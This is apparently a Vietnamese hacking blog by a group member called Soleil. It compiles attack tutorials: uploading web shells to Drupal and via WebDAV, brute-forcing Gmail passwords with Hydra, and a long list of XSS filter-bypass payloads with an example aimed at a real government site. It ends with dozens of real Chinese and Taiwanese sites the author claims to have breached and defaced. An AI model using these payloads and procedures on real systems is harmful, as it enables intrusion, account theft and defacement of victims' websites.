Kỹ Thuật Upshell Đối Với Drupal

Bước 1: Thiết lập mặc định PHP code

Login với tài khoản admin và vào theo mục sau:  Admin -> Administer -> Site configuration

Tích vào PHP code  ->   Set default format

Bước 2: Chèn Shell vào nôi dung văn bản

Vào theo mục sau: Admin -> Create content . Sau có chọn 1 mục bất kỳ và chèn nội dung code shell vào phần nội dung văn bản  “Body”.  Sau đó lưu lại.

[TUT] Crack Password Gmail Bang Backtrack 5

Bước 1: Mở chương trình Bruite force Hydra-gtk trong Backtrack

Backtrack -> privilege Escalation -> Password Attacks ->  Online Attacks -> Hydra-gtk.

Bước 2: Cấu Hình cho Email

Single target: smtp.gmail.com

Port: 465

Protocol: smtp

Chọn: Use SSL, show attempts and be verbose

Ebooks Hacking Chọn Lọc

Trong quá trình tìm hiểu Hacking, sau đây là những ebook hay, được soleil đánh giá cao và muốn chia sẻ. 

1 – Tài liệu hướng dẫn sử dụng BackTrack 5 – Version tiếng viêtk

http://www.mediafire.com/view/?2kd8k4ri9jlfh68

Tài liệu này được viết bởi cutynhangheo   - Admin HCE theo kiểu biên dịch lại từ Ebook tiếng anh. Tuy chỉ nói lên 1 phần nhỏ của công cụ hack kinh điển backtrack nhưng khá bổ ích đối với các bạn đang bắt đầu tìm hiểu về Backtrack.

2 –  Tấn công và bảo vệ hệ thống

http://www.mediafire.com/view/?oe6vgwigw3h7sc2

Ebook này được viết bởi giảng viên TT Itrain – Chuyên gia bảo mật hàng đầu tại VN - tocbatdat. Với tư duy loric, kiến thức thâm hậu, cách viết rõ ràng, chi tiết. Độc giả có thể dễ dàng hiểu và nắm bắt bản chất các vấn đề xoay quanh: Nguyên tắc scan port, nguyên lý truyền tin, DDos-Botnet – Trojan-Backdoor, Gmail Hacking, Website Hacking ...

3 –  Elite Collection HVA

 http://www.mediafire.com/?1a46wavdgj121rb

Ebook này được tổng hợp lại bằng phần mền – bao gồm tất các các tài liệu của nhóm Hacker hàng đầu Việt Nam – HVA với tất cả các vấn đề cơ bản xoay quanh, liên quan đến bản chất Hacking như: Unix, Lunix, Windown, Registry, How to be a Hacker...

4 –  Ghi Nhớ Ubuntu

http://www.mediafire.com/view/?p6s1pv966a44rcl

Ebook ghi nhớ  các lênh trong hệ điều hành linux – Ubuntu – Cái không thể không biết khi nghiên cứu, tìm hiểu về hacking. Ebook tổng hợp khá chi tiêt và đầy đủ các câu lệnh.

5 - The Hacker's Underground Handbook

Cuốn Ebook về hacking nước ngoài, viết về các vấn đề xoay quanh hacking như : programming, linux, password, Network Hacking, Wireless Hacking, Windown Hacking, Malware, WebsiteHacking. Cuốn ebook khá hay và chi tiết – Có cách nhìn tổng thể về hacking. Giá bán trên thị trướng khoảng vài trăm dolla.

[Bài 3 - XSS] Kỹ thuật Bypass và phương pháp tấn công XSS

                       

               Trong bài trước Giới thiệu chung về XSS Soleil đã giới thiệu qua về cách kiểm tra, xác định 1 site dính XSS và một số thao thác thực thi trên sites bị dính lỗi . Trong bài này Soleil sẽ đề cập đến các kỹ thuật bypass và quá trình thực hiện 1 cuốc tấn công bằng XSS

     7.       Kỹ Thuật Bypass

                1 số site dính XSS không thể tấn công bằng những đoạn mã đơn giản, giải pháp nghĩ đến đó là phải bypass bộ lọc. Có một số dạng bypass đoạn mã script như sau:

       "><script>alert("Check By Soleil")</script>
"><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </script>
'><script>alert("Check By Soleil ")</script>
'><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
     <ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
<ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
"><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
"><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) </ScRIPt>
'><ScRIPt>aLeRT("Check By Soleil ")</ScRIPt>
'><ScRIPt<aLeRT(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</ScRIPt>
</script><script>alert("Check By Soleil ")</script>
</script><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108) )</script>
"/><script>alert("Check By Soleil ")</script>
"/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
'/><script>alert("Check By Soleil ")</script>
'/><script>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</script>
</SCRIPT>"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>"><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))
</SCRIPT>">"><SCRIPT>alert("Check By Soleil ")</SCRIPT>
</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))</SCRIPT>
</SCRIPT>">'<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>
";alert("Check By Soleil ");"
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));"
';alert("Check By Soleil ");'
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108));'
";alert("Check By Soleil ")
";alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108)) ';alert("Check By Soleil ")
';alert(String.fromCharCode(67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108))

           Trong đó: 67, 104, 101, 99, 107, 32, 66, 121, 32, 83, 111, 108, 101, 105, 108 chính là chuỗi string “ Check By Soleil” ở dạng char.

       Ví dụ:

    -          Attacker có thể chèn vào thanh tìm kiếm site http://www.hanoi.gov.vn    đoạn mã script đã bypass sau:

<SCRIPT>alert(String.fromCharCode(67,104,101,99,107,32,66,121,32,83,111,108,101,105,108,45,86,72,66,32,89,104,58,100,117,99,100,117,110,103,46,48,56,99,108,99 ))</SCRIPT>

      Từ đó xác định site này đã chính lỗ hổng XSS và sẽ tìm cách để khai thác, chiếm quyền điều khiển đối với site này.

[TUT] Upshell Và Deface Sử Dụng Webdav

Tool:

http://www.mediafire.com/?6g1tnx6gd8ik1qv

 

Tool scan thấy có dính mã độc. Khuyến cáo ae nên sử dụng trên máy ảo

Pass dải nén: vhb

Bước 1: Vào Tab webDav và chọn ASP Shell Maker

[Bài 2 - XSS] Giới thiệu Chung về XSS và Phương pháp kiểm tra lỗi

               Trong bài thứ nhất Giới Thiệu Chung Về XSS Soleil đã giới thiệu những nội dung chính sẽ viết, Ở bài thứ 2 này soleil sẽ giải thích rõ về XSS, phương pháp check site dính XSS và 1 số thao thác khi thực hiện tấn công theo phương thức XSS.

1-      XSS là gì ?

       XSS( Cross-Site Scripting ) là một trong những kỹ thuật hack website phổ biến nhất hiện nay bằng cách chèn vào url, chèn qua các thanh tìm kiếm hoặc chèn ở bất cứ 1 textbox nào những thẻ HTML hoặc những đoạn mã script nguy hiểm, từ đó chiếm quyền điều khiển của victim hoặc thực hiện những mệnh lệnh mà hacker đưa ra.

 

2-      Nguyên lý hoạt động XSS

       Khi website đã bị chèn các thẻ html hay những đoạn mã script nghĩa là đã gửi các request từ máy client đến server nhằm chèn vào đó các thông tin vượt quá tầm kiểm soát của server. Khi người sử dụng click vào những link đó thì toàn bộ cookies, mật khẩu lưu trên trình duyệt được gửi về cho hacker qua email hoặc 1 file nào đó trên host đã được thiết lập từ trước hoặc bị dẫn tới 1 trang fishing mà hacker đã thiết lập từ trước hay bị cài đặt các chương trình virus, Trojan, backdoor trên máy victim tùy vào mệnh lệnh của hacker

3-      Phân loại XSS

XSS Có 2 dạng, đó là:

    +     Persistent 
+     Non-Persistent type

4-      Mức độ nguy hiểm XSS

   + Ăn cắp cookies, mật khẩu, cướp session làm việc

   + Cài các loại virus, trojan, backdoor trên máy tính victim

   + Deface website. Tuy nhiên nó chỉ chạy trên trình duyệt phía client và chỉ tấn công vào bề mặt website, không làm thay đổi cấu trúc mã nguồn, cơ sở dữ liệu của website trên server.

Lời xin lỗi - Chút bộc bạch

Như tiêu đề, Soleil gửi lời xin lỗi tới tất cả các bạn đọc vì đã không thực hiện lời hứa - Tiếp tục viết và  public tut được nữa

Thời gian này, bước vào kỳ cuối cùng của quãng đời sinh viên - Chuyên ngành cơ khí HK, chất lượng cao - BK HN. Khối lượng đồ án và bài tập kỳ cuối cùng gần như quá tải. Vì thế chắc sẽ không còn nhiều đêm trắng cùng ae ngồi mày mò, gõ gõ như thời gian vừa qua được nữa. Soleil  thực sự muốn tập trung 1 kỳ cuối cùng cho chuyên ngành và thực hiện 1 số dự định. Vì vậy thời gian này, có thể trong vòng 3,4 tháng nữa, sẽ có ít tut trên blog - Mong các bạn đọc thông cảm và không gửi mail thêm nữa.

Nhân tiện những bạn nào có niềm đam mê với hacking muốn gia nhập vào VHB http://vhbgroup.net  cùng ae trong đó trao đổi học tập & trao đổi thì có thể để lại user và mail. Pass mặc định là 123456@, các bạn nhơ change pass sau khi vào 4rum. Soleil hứa sẽ reg nick cho tất cả xem như 1 hành động gỡ lỗi. Và VHB vẫn sẽ hoạt động bình thường.

Thân! 

[Bài 1 - XSS ] Giới Thiệu Chung

Soleil sẽ góp 1 chút kiên thức về XSS cho ae tham khảo trong 3 bài viết. Bài đầu tiên sẽ mang tính chất giới thiệu. Trong quá trình viết có gì sai sót mong được ae góp ý.

Các nội dung chính:


1- XSS là gì ?

2- Nguyên lý hoạt động XSS

3- Phân loại XSS

4- Mức độ nguy hiểm XSS

5- Phương pháp check site dính lỗ hổng XSS

6- 1 số thao tác khi tấn công bằng XSS

7- Kỹ Thuật Bypass

8- Demo 1 số site dính XSS:

9- Quá trình các bước thực hiện tấn công bằng XSS


Trong bài 2, Soleil sẽ viết từ mục 1 đến mục 5 ^^

Private Blog - VHB_Group

Nhân dịp VHB comback, soleil sẽ public 1 số tut khá nhạy cảm và sẽ private blog và chỉ dành cho thành viên VHB truy cập.

Ngoài ra, Nếu ai có nhu cầu để cấp quyền truy cập blog thì để lại email phía dưới.

Sẽ chính thức private sau 1 tuần từ lúc pub thông báo này. (đến 25/8). Sau ngày 25/8 sẽ ko cấp quyền cho bất cứ 1 ai nưa,

Thân!

Check site .cn tối ngày 7/8/12

1 số site khựa bảo mật kém bị check tối 7/8

http://www.mila.dk/soleil.html

http://www.kelugp.com/soleil.html

http://thepar-group.net/soleil.html

http://www.kuobao.net.cn/soleil.html

http://lyg.jx.cn/soleil.html

http://www.jzlsxx.gov.cn/soleil.html

http://www.zdchina.com.cn/soleil.html

http://zl.zhqc.org.cn/soleil.html

http://blog.qstxx.com.cn/soleil.html

http://gh.rc.gov.cn/soleil.html

http://www.tedelon.cn/soleil.html

http://www.fses.com.cn/soleil.html

http://www.ecitycn.com/soleil.html

http://www.aysx.cn/soleil.html

http://zhishi.lwjl.com.cn/soleil.html      

http://www.ndjsw.gov.cn/soleil.html   

http://www.tywl99.cn/soleil.html

http://www.tedelon.cn/soleil.html

http://nj.lookhouse.cn/soleil.html

http://thepar-group.net/soleil.html

http://www.autowuhan.com.cn/soleil.html

http://www.av8software.com/soleil.html

http://www.cstradingcn.com/soleil.html

http://www.deepmeter.com/soleil.html

http://www.csmarketingco.com/soleil.html

http://www.kelugp.com/soleil.html

http://xtjw.bsd108.com/soleil.html       

http://lppm.bigc.edu.cn/soleil.html

http://www.escco.com.cn/soleil.html

http://tms.nai.edu.cn/soleil.html

http://www.netsmart.cn/soleil.html     

http://cgibin.cgfreight.cn/soleil.html

http://news.cgfreight.cn/soleil.html

http://xxx.cgfreight.cn/soleil.html

http://jsj.jinchuan.gov.cn/soleil.html
http://www.jdafang.com/soleil.html 

http://www.jsroc.com.tw/soleil.html
http://www.horshin.com.tw/soleil.html
http://www.worldchemical.com.tw/soleil.html
http://www.shin-yi.com.tw/soleil.html
http://www.idean.com.tw/soleil.html

1 số site đã bị deface :

http://www.ndjsw.gov.cn/ 

http://gh.rc.gov.cn/ 

http://zl.zhqc.org.cn/

Topic sẽ tiếp tục cập nhật trong tối nay ^^